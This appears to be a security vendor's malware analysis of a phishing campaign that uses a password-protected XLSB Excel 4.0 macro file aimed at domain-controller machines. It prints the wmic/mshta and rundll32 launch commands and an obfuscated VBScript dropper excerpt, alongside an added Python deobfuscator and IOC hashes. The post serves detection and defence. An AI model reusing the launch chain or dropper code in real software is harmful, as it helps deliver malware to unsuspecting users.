Distribution of Malicious Excel Files Targeting Companies Amid Black Friday Season

Malicious Excel files are being distributed to companies amid the Black Friday season. The email confirmed today (Nov 25th) was received from the targeted company. Attached to the email is an Excel file that contains an Excel 4.0 macro (XLM) sheet, saved in the XLSB Excel binary format. The file checks whether the system is a domain controller and then activates additional malicious features.

The filename of the attached Excel file is 'promo details-[number].xlsb', and its file format is XLSB. XLSB is the Excel Binary File Format, whose structure differs from that of XLS and XLSX files. Unlike XLSX, which is a text-based XML file format (see figure below), XLSB consists of binary data, making it harder for analysts, and for anti-malware software that scans specific file types, to interpret its contents. This is not the first time a malicious XLSB file has been discovered, but since the distributed files have mostly used the XLS or XLSX formats, this trend calls for increased attention going forward.

Figure: XLSB file format (binary data containing the macro sheet in an XLSB file)
Figure: XML data containing the macro sheet in an XLSX file

Upon opening the Excel file, the following is shown; after the user enables macros and clicks the image, the embedded malicious features are activated. This design appears intended to evade detection measures such as automated analysis systems. Furthermore, the attacker added 'protection' to the Excel file to complicate analysis: the macro sheet can only be viewed after entering the correct password, which shows that the malware development process has become more sophisticated.

When the user clicks the image, the file creates a malicious file in the ProgramData directory and runs it through mshta via WMIC. The malicious file is a VBScript file disguised as an RTF file.

Command line: wmic process call create "mshta C:\ProgramData\cbfyx.rtf"

The executed VBScript contains the following code (excerpt). Its main features are as follows:

  • Checks the %USERDOMAIN% and %LOGONSERVER% values of the user's system to determine whether it is a domain controller
  • If it is a domain controller, connects to https://cdn.discordapp.com to check whether a network connection is available
  • If it is not a domain controller, the remaining features do not run
  • Creates a malicious DLL file in the ProgramData directory
  • Runs the malicious DLL with the rundll32.exe process: C:\ProgramData\nianigger.bin DllRegisterServer
<script type="text/vbscript" LANGUAGE="VBScript" >
' Builds the rundll32.exe command line (the one listed above) from string fragments and Chr() calls
G_Q_w_i_Y_t_S_V_Y_W_n_K_s_i_F = "ru" & "" & Chr(110+1-1) & "dll" & "32." & "ex" & Chr(101+1-1) & Chr(32+1-1) & Chr(67+1-1) & ":\\" & Chr(80+1-1) & "ro" & Chr(103+1-1) & "ra" & "mDa" & "" & "ta\" & Chr(110+1-1) & "ian" & Chr(105+1-1) & "gge" & Chr(114+1-1) & ".bi" & "n D" & Chr(108+1-1) & "lR" & "egi" & "ste" & "rS" & "er" & "ve" & "" & Chr(114+1-1)
' Decodes to CreateObject("MSXML2.ServerXMLHTTP.6.0"), an HTTP client object
Set Q_o_b_k_v_e_J_u_V_s = CreateObject("" & "MSX" & "" & Chr(77+1-1) & "L2." & "" & "Se" & "rve" & "rXM" & Chr(76+1-1) & "HT" & "TP." & "" & "" & "" & Chr(54+1-1) & Chr(46+1-1) & Chr(48+1-1))

' Decodes to "Wscript.Shell", used below to read environment variables
H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k = Chr(87+1-1) & "" & "scr" & Chr(105+1-1) & "" & "" & "" & "pt." & "Sh" & Chr(101+1-1) & "" & Chr(108+1-1) & "" & Chr(108+1-1)
Set W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z = CreateObject(H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k)
' Reads %USERDOMAIN% and %LOGONSERVER% (Chr(92) is the backslash stripped from the latter), lower-cased for comparison
w_g_x_q_b_O_S_y_G_g_w_c = LCase(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.ExpandEnvironmentStrings("%USERDOMAIN%"))
e_K_l_a_I_l_c_E_t = LCase(Replace(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.ExpandEnvironmentStrings("%LOGONSERVER%"), Chr(92+1-1+1-1), ""))
' Decodes to CreateObject("Scripting.FileSystemObject"), used for file creation
Set q_h_H_U_O_o_S_q = CreateObject("" & "" & Chr(83+1-1) & "" & "cri" & "pt" & "ing" & Chr(46+1-1) & "" & Chr(70+1-1) & "ile" & Chr(83+1-1) & Chr(121+1-1) & "" & "ste" & "mOb" & "" & "je" & Chr(99+1-1) & Chr(116+1-1))

</script>
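As an added example (not code from the original post or from AhnLab), a small Python decoder for the string-building obfuscation used in the script above: it normalises the blog's curly quotes, evaluates the Chr(N+1-1) arithmetic without eval(), joins the fragments in source order, and resolves CreateObject(var) back to the decoded ProgID, so an analyst can read the COM objects and environment variables the script uses without executing it. The sample input is constructed from the lines quoted above (the rundll32 line is omitted).

```python
import re

# Sample input constructed from the obfuscated VBScript lines shown above (rundll32 line omitted).
# The blog's curly quotes are kept on purpose so the decoder shows it normalises them.
SAMPLE = '''
Set Q_o_b_k_v_e_J_u_V_s = CreateObject("" & "MSX" & "" & Chr(77+1-1) & "L2." & "" & "Se" & "rve" & "rXM" & Chr(76+1-1) & "HT" & "TP." & "" & "" & "" & Chr(54+1-1) & Chr(46+1-1) & Chr(48+1-1))
H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k = Chr(87+1-1) & “” & “scr” & Chr(105+1-1) & “” & “” & “” & “pt.” & “Sh” & Chr(101+1-1) & “” & Chr(108+1-1) & “” & Chr(108+1-1)
Set W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z = CreateObject(H_b_D_t_I_v_B_r_w_y_h_x_c_z_Y_k)
w_g_x_q_b_O_S_y_G_g_w_c = LCase(W_X_H_p_K_v_o_y_y_V_Y_i_c_n_m_z.expandenvironmentstrings(“%USERDOMAIN%”))
Set q_h_H_U_O_o_S_q = CreateObject(“” & “” & Chr(83+1-1) & “” & “cri” & “pt” & “ing” & Chr(46+1-1) & “” & Chr(70+1-1) & “ile” & Chr(83+1-1) & Chr(121+1-1) & “” & “ste” & “mOb” & “” & “je” & Chr(99+1-1) & Chr(116+1-1))
'''

_QUOTES = str.maketrans({'\u201c': '"', '\u201d': '"'})                  # curly -> straight double quotes
_TOKEN = re.compile(r'"([^"]*)"|\bchr\(([0-9+\-\s]+)\)', re.IGNORECASE)  # string literal or Chr(arithmetic)
_ASSIGN = re.compile(r'\s*(?:Set\s+)?(\w+)\s*=\s*(.+)', re.IGNORECASE)   # [Set] name = rhs

def eval_chr_arg(arg: str) -> int:
    """Evaluate the 'N+1-1' style integer arithmetic inside Chr() without using eval()."""
    total, sign = 0, 1
    for tok in re.findall(r'[+-]|\d+', arg):
        if tok in '+-':
            sign = 1 if tok == '+' else -1
        else:
            total += sign * int(tok)
    return total

def decode_concat(expr: str) -> str:
    """Join every string literal and Chr() call in expr, in source order, into one string."""
    expr = expr.translate(_QUOTES)
    return ''.join(lit if arg == '' else chr(eval_chr_arg(arg)) for lit, arg in _TOKEN.findall(expr))

def deobfuscate(script: str) -> dict:
    """Map each assigned variable to the string its right-hand side builds."""
    values = {}
    for line in script.splitlines():
        m = _ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.group(1), m.group(2)
        decoded = decode_concat(rhs)
        if not decoded:  # e.g. CreateObject(var): resolve the earlier variable it refers to
            for var, val in values.items():
                if re.search(r'\b%s\b' % re.escape(var), rhs):
                    decoded = val
        values[name] = decoded
    return values

def com_progids(script: str) -> list:
    """ProgIDs handed to CreateObject(), decoded, in order of appearance."""
    values = deobfuscate(script)
    return [values[m.group(1)] for m in map(_ASSIGN.match, script.splitlines())
            if m and 'createobject' in m.group(2).lower()]
```

Running com_progids(SAMPLE) yields the three COM objects the excerpt instantiates: the HTTP client, the shell object used for environment lookups, and the file system object.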

To summarize, the email and the malicious Excel file found in this case are malware targeting companies. Similar attacks are expected to continue even after the Black Friday season ends.

[File Detection]
Downloader/XLS.Generic

[Behavior Detection]
Execution/MDP.Behavior.M3819

[IOC]
9f27881dd96c57de0495bf609b954af5
33411e3b8028fe4b8f9786b440d0b098
f2c941b14d81c9b6b7a7aa6b98f91ce9
e73d286a4915a3f62516a701f5ae9467

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Distribution of Malicious Excel Files Targeting Companies Amid Black Friday Season appeared first on ASEC BLOG.
